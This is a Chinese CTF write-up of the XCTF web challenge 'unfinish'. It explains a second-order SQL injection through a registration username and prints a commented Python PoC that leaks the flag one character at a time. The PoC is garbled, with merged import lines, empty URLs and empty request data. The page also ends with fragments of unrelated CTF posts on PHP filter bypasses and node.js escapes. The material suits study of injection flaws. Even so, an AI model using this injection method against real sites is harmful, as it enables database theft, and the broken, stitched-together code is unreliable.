攻防世界web高階題—unfinish
1、看一下題目提示sql
2、開啟題目看一下原始碼,沒有問題
4、掃一下目錄,掃到乙個註冊頁面——/register.php
註冊乙個賬號登入,登陸後的介面為
沒有可利用的地方,返回上一步,註冊,既然是sql注入,那就嘗試著繞過
登入後發現使用者名為2
猜測此處的sql語句為insert ........'username' 我們構造的語句執行為 insert......'1'+'1'
既然知道閉合方式,然後開始注入(二次注入)
用大佬寫的poc,我注釋一下幫助理解
import requests得到flagimport re
register_url = '
'#註冊**
login_url = '
'#登入**
for i in range(1, 100
): register_data =
res = requests.post(url=register_url, data=register_data)#進行註冊並修改使用者名稱
login_data =
res_ = requests.post(url=login_url, data=login_data)#通過引數來登入
code = re.search(r'
\s*(\d*)\s*
', res_.text)#正規表示式來獲取登陸後的使用者名稱
print(chr(
int(code.group(1))), end='') #group()用來提出分組截獲的字串,()用來分組,int來轉換字元型別,chr 返回值是當前整數對應的 ascii 字元
sql二次注入是什麼?
二次注入可以理解為,攻擊者構造的惡意資料儲存在資料庫後,惡意資料被讀取並進入到sql查詢語句所導致的注入。也即是說,我注入了惡意資料,我引用惡意資料來進行sql注入。
攻防世界 web(高階區)
瞅瞅高階區的,繼續總結。var t fl s a i e var n a h0l n var r g 得到flag 開啟場景鏈結 你可以瀏覽這個 嗎?no,i can t.檢視原始碼什麼都沒有,後面加上index.php。沒用,加上index.phps phps檔案就是php的源 檔案,通常用於提供...
記錄攻防世界web高階
考點 考審計php 的基本能力,以及繞開的能力 知識點 1.兩個函式 str replace php page 替換函式 strstr page,php 查詢函式,即輸出在乙個字串裡面第一次出現的位置 且對大小寫敏感 即繞開了 php input功能應用 接受請求的get或者post資料 2.dat...
攻防世界 web高階 leaking
考察 node.js逃逸 參考 不知道咋說,直接抄原始碼 encoding utf 8 import requests import time url response while flag not in response req requests.get url response req.text...